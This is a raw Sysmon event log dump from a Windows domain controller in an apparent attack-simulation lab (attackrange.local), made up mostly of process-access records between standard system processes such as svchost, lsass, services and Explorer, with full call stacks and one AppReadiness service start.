13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll
+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.211{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0A00-00000000A301}8485104C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.164{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.169{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x800000000000000010317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.164{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.086{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.086{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.696{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
